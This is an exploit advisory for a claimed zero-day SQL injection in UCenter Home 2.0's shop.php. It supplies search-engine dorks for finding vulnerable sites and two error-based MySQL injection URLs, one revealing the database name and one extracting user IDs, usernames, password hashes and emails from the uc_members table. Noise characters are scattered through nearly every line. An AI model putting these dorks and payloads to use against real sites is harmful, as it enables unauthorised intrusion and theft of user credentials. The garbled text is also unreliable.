9 r7 {; ~ `% L- t
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
1 `. n1 L3 \9 c7 s! B& m
( ^: Y5 I" p7 _# p! a' X
7 z, y7 m' z3 {# {+ F& S
F- e# g( s1 n$ d: _' r: T*/ Author : KnocKout 6 U9 l0 G1 Y7 Z6 G1 x# ~+ R
/ V- j8 v0 i: `9 c*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
& `/ B5 o- e) p0 @' N
! U1 o8 f/ J" s2 B- c; u*/ Contact: knockoutr@msn.com / }/ a: K9 X) K. j" N) {2 u" Z
1 o( E6 Y- t; v2 T- Y; E*/ Cyber-Warrior.org/CWKnocKout
( v& C6 ?" P% X" U
" I1 b# P; Z; m/ u- S; ] ]__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 4 o9 \+ x2 Y/ U, l" {( B7 r M
: F3 a8 v |0 `& @5 r. I* YScript : UCenter Home
4 ?- k) F3 Q; n5 P" N0 b2 Z$ Z) o) y! u/ }4 Q
Version : 2.0
& }. A% E- v& w) S8 h: }" e" n0 @ f$ T+ [! Y5 t" E
Script HomePage : http://u.discuz.net/ , [7 B, Y1 t6 C, y6 ]! r
, R' y2 {# l I; a9 U: G0 w
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 0 R+ t4 n0 ]+ x3 J
! |; u8 k; S3 J% e. b- H9 @
Dork : Powered by UCenter inurl:shop.php?ac=view
- N% j) b2 |5 q b. B7 E; }5 }) O$ W
Dork 2 : inurl:shop.php?ac=view&shopid=
" \5 d. {9 x; f( |( }, G% \* Q4 o B# Q& b2 H
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ' [+ o D* X$ W$ B1 `, j; J
% T/ X4 f, ^, h: L, }4 n
Vuln file : Shop.php
: i: u7 N) }: V3 l4 X" P3 |1 A& T, H7 S/ F
value's : (?)ac=view&shopid= % o! u, n1 b# b' k2 q+ {% U
- G4 ]8 U+ @: I; I2 u' MVulnerable Style : SQL Injection (MySQL Error Based) : U. w( I# v% G
% W: ~% u9 o; r/ C4 SNeed Metarials : Hex Conversion
/ {2 m' b: i' G% f- G
: v, H- {" f; y3 }__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 0 `, v. y% @* H! T
5 k7 K& t4 q, _- G1 m$ [
Your Need victim Database name. : A6 O' G( o( \- [! C
2 G7 ]! r$ P* M2 D$ O+ t+ e
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
0 P0 W- ?+ P4 L, R' t5 T0 H; l% p' K+ p5 h( ?# e
..
6 O! A+ K& Y! g: G/ ^5 P2 U( h
: {) D& a t7 p& w2 QDB : Okey. 3 D* K; _8 a/ B- L0 v
3 S" S2 D* h, j o: t! ]1 _% z! o9 y
your edit DB `[TARGET DB NAME]` 2 `1 [2 E/ c5 I$ g3 o' d8 ~/ d% _1 G$ e
0 v8 T! x+ B' DExample : 'hiwir1_ucenter' 3 X7 H+ f6 S0 _ {' T5 `
" V) v+ Y# G+ ]8 _6 I' _
Edit : Okey. & l6 J7 Q- d) u% D' X& q
- W+ m) m- L4 h2 u6 ~Your use Hex conversion. And edit Your SQL Injection Exploit..
& L" z! q& Q j/ f: k0 M
. x2 ]- h" `! }$ S* R* _ 9 ? @4 _) u9 V, N0 N+ i
8 {- D1 f. H$ h4 l" r& v: lExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
* N5 @$ F: m- n+ w" M4 W6 C |